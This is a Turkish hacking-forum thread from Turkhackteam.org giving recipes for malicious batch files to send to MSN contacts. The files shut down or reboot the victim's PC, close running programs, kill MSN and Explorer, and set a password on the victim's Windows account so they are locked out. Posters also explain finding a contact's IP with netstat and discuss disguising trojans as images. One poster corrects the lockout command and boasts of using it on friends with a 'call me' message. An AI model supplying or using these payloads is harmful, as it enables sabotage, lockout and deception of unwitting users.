Prog.sız MSN de işe yarayan küçük hackler

mert-000

Yeni üye
23 Mar 2008
11
1
1)Karşı Pc'yi kapatmak:
İlk önce not defterini açıyoruz ardından shutdown -s yazıyoruz ve farklı kaydet diyip xxx.bat olarak kaydediyoruz
(xxx dosyanın ismi olacaktır sonra değiştirirsiniz).Bunu karşı tarafa atmak için WinRar'la sıkıştırıyoruz.Sonra da atıyoruz
açtığında Pc'si direkt olarak kapanır(çevrimdışı olduğundan anlarsınız )

2)Karşı Pc'yi Resetlemek:
İlk önce not defterini açıyoruz ardından shutdown -r yazıyoruz ve farklı kaydet diyip xxx.bat olarak kaydediyoruz
(xxx dosyanın ismi olacaktır sonra değiştirirsiniz).Bunu karşı tarafa atmak için WinRar'la sıkıştırıyoruz.Sonra da atıyoruz
açtığında Pc'si direkt olarak resetlenir(çevrimdışı olduğundan anlarsınız )

3)Karşı Pc'ye şifre koymak:
İlk önce not defterini açıyoruz ardından
netuser %username% mustymusty
shutdown -r
yazıyoruz.Ve farklı kaydet diyip xxx.bat olarak kaydediyoruz.Bu arada mustymusty şifre olacaktır
(siz istediğiniz şeyi yazabilirsiniz).WinRar'la sıkıştırıp atıyoruz ve açıldığında Pc restlenecektir
(shutdown -r kodu old. dolayı) açılırken de şifre isteyecektir

4)KarşıPc'nin Ip No'sunu bulmak:
Karşı taraftan dosya kabul edin.O dosya gelirken Başlat>Çalıştır'a cmd yazın.Daha sonra çıkan pencereye netstat -an
yazın.5-6 tane sayı çıkacaktır.Bunların yanında LISTENING yazanlar değildir ona göre.Genelde 2 tane ESTSHHABLED yazan
numaralardır bunlarında 84 ya da 85 ile başlayanıdır.
Ya da karşı tarafa bir dosya yollayın (müzik veya resim tavsiyemdir) Başlat>Çalıştır'a cmd yazın.Çıkan pencereye netstat -n
yazın.5-6 tane sayı çıkacaktır.Bunların yanında LISTENING yazanlar değildir ona göre.Genelde 2 tane ESTSHHABLED yazan
numaralardır bunlarında 84 ya da 85 ile başlayanıdır.

5)Karşı Pc'de çalışan uygulamaları kapatmak:
İlk önce not defterini açıyoruz ardından shutdown -f yazıyoruz ve farklı kaydet diyip xxx.bat olarak kaydediyoruz
açtığında Pc'de çalışan bütün uygulamalar kapanır(kuban hiçbişey yapamaz..)
6)Yazdıgınız kodların cogunluguna gore msnı kapanır ve ekran gıdıp gelır.ilk basta notepad'ı acıyoruz.karsıdakının sadece msnını kapatmak ıstıyorsak sadece alt alta start tskill msnmsgr yazmanız yeterlı.(ne kadar cok yazarsanız o kadar cok uzun sure kapanır msnı) ekranın kapanıp acılmasınıda ıstıyorsak yıne aynı sekılde alt alta start tskill explorer yazınız.eger ıkısınıde yapmak ıstıyorsanız:
start tskill explorer
start tskill msnmsgr
yukarıdakı gıbı yapınız.ve notepadı farklı kaydet yapıp uzantısını .bat olarak kaydedınız ve kısıye yollayınız.
Beyler emeğe saygı diyelim eleştiri ve tebriklerinizi beklrim
:p:p:p

neoser

Yeni üye
5 Eki 2006
43
0
tebrik ederiz. yalnız benim takıldığım birkaç nokta var.
3. madde;
burda şifre koyduk resetlettik açılışta şifre istedi,peki başka admin şifresi varsa eleman yine girer bilgisayarına... dıoğru mu değil mi???

bir de dosyalar bat uzantılı olacak denilmiş.
başka bir bölümde bi arkadaş trojen dosyalarını resim kodlarının içine iliştirerek görünmesinin engellenebileceğinden bahsetmiş.yani alıcı sadece resim görüyor ve tıklıyor.
bu şekilde bir yöntem uygulanabilir mi?uygulanırsa karşı tarafa daha inandırıcı olur bence...

mert-000

Yeni üye
23 Mar 2008
11
1
1 Walla ben hiç ole denemedim önun için bişi diyemeyecem
2. si kurbanı en iyi nasıl trojanı alması için ikna edebilisen o yontem daha iyidir
tabikide resim olursa kurbanın trojan olduğunu anlaması da o kadar zorlaşır.

neoser

Yeni üye
5 Eki 2006
43
0
hayır ben iknadan bahsetmiyorum mert.resimin içine kodları yapıştırsak,resmi açtığımızda hem resim hem de kodun çalışmasını sağlayabilir miyiz,onu soruyorum.
ayrıca 3. yöntem işe yaramıyor.yaptığımda reset atıyor fakat,şifre koymadan doğrudan giriyor.acaba xp'den mi kaynaklanıyor?
ve son soru;reset attırmaya bastığımızda 30 sn bekliyor.bunu da 1 saniyeye düşürsek de hemen yapsa daha güzel olur bunu komutu yok mu?

mert-000

Yeni üye
23 Mar 2008
11
1
hayır ben iknadan bahsetmiyorum mert.resimin içine kodları yapıştırsak,resmi açtığımızda hem resim hem de kodun çalışmasını sağlayabilir miyiz,onu soruyorum.
ayrıca 3. yöntem işe yaramıyor.yaptığımda reset atıyor fakat,şifre koymadan doğrudan giriyor.acaba xp'den mi kaynaklanıyor?
ve son soru;reset attırmaya bastığımızda 30 sn bekliyor.bunu da 1 saniyeye düşürsek de hemen yapsa daha güzel olur bunu komutu yok mu?

vallaresim konusunda ben onu denemedim o yuzden bişi diyemiycem çunkü ne dersem yalan olur sen bir uğraş, dene eminim başarırsın.
bide 3. yöntem işe yaramıyor dedin ben bi tekrar araştırim kodlarda bir hata olacak herhalde bulursam yazarım bulamassam kusura bakma beni affet olurmu:D:D:D
EMEĞE SAYGI GÖSTERİLDİKÇE DEWAMI GELECEKTİR

neoser

Yeni üye
5 Eki 2006
43
0
herşey için şimdiden çok sağolasın....
bir de bilgisayarda bunlarla alakalı başka kodlar varsa elinde onları da alabilirim...
:D :D :D

neoser

Yeni üye
5 Eki 2006
43
0
mert-000 kardeşim. sana yukarıda yazdığın şeyler konusunda birkaç soru sormuştum ya ve sen de "bide 3. yöntem işe yaramıyor dedin ben bi tekrar araştırim kodlarda bir hata olacak herhalde bulursam yazarım bulamassam kusura bakma beni affet olurmu:D:D:D" demiştin ya;
bunların bir kısmının çözümünü ben yaptım...
kodlarda biraz araştırma yaptım ve şu sonuçlara ulaştım.

Usage: shutdown [-i | -l | -s | -r | -a] [-f] [-m \\computername] [-t xx] [-c "comment \\computername Remote computer to shutdown/restart/abort
-t xx Set timeout for shutdown to xx seconds
-c "comment" Shutdown comment (maximum of 127 characters)
-f Forces running applications to close without warning
-d [p]:xx:yy The reason code for the shutdown
u is the user code
p is a planned shutdown code
xx is the major reason code (positive integer less than 256)
yy is the minor reason code (positive integer less than 65536)

Examples
shutdown -r -c "Rebooting for latest updates."

bu kısım sırf shutdown'a mahsus özellik
bunun dışında 3. maddede sorun var demiştim ya, o sorunun nedeni de

netuser %username% mustymusty
shutdown -r

yazımındaki netuser'den kaynaklanıyor.bu kısım ayrı yazılacak. yani doğrusu;

net user %username% mustymusty
shutdown -r

şimdi benim yaptığım örnek kodu sizlere sunuyorum.incelersinin,hoşunuza gideceğinden eminim.

net user %username% kumbara
shutdown -r -t 30 -c "Bilgisayarini sifreledim.
ögrenmek istiyorsan beni ara"

bunu birkaç arkadaşıma telefon numaramı verdikten sonra yaptım... çok etkili... ve iyi karizma sağlıyor.

bir de yeni yazdığım bir klasör içeriğini otomatik kaldıran kod örneğini paylaşmak istiyorum. Skype'ın yeni sürümünde "beni unut" butonu koymadıklarından kendimizi bilgisayara unutturmak istediğimizde zorlanıyoruz, her seferinde o dosyaların bulunduğu yeri aramaktansa bir bat dosyasına çift tıklayarak kolay bir şekilde kendimizi skype'a unutturabiliyoruz

buyrun kodumuz

rd /s /q C:\Users\neoser\AppData\Roaming\Skype\silinecek_dosya_adı\

Bilmeyen arkadaşlar için söylüyorum ki burda directory'yi kendinize göre seçeceksiniz, yoksa çalışmaz :) (bu konuda sorunuz olursa cevaplamaktan zevk duyarım)

ve ayrıca;
mert-000 bu yazdıklarımı senin ana başlık altına benim ek ismimle eklersen sevinirim.herkes görsün.
gelecek olan REP'ler için şimdiden teşekkür ederim

Son düzenleme:

mert-000

Yeni üye
23 Mar 2008
11
1
Kardeş ne demek sen yeterki iste kanka emee saygı gösterildikçe her saman demişimdir.
İilk hangi konuyu açarsam onun yanına senin ismin de gelecek keyfine bak
+++++++++ rep dostum

neoser

Yeni üye
5 Eki 2006
43
0
eyvallah kardeşim benim... bu forumda arkadaş listesine ekle diye birşey vardı ama kardeş listesine ekle diye birşey aradım onu bir türlü bulamadım.öyle bir kısım açarlarsa seni direkt oraya ekleyecem şimdilik arkadaş listesindesin :)

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.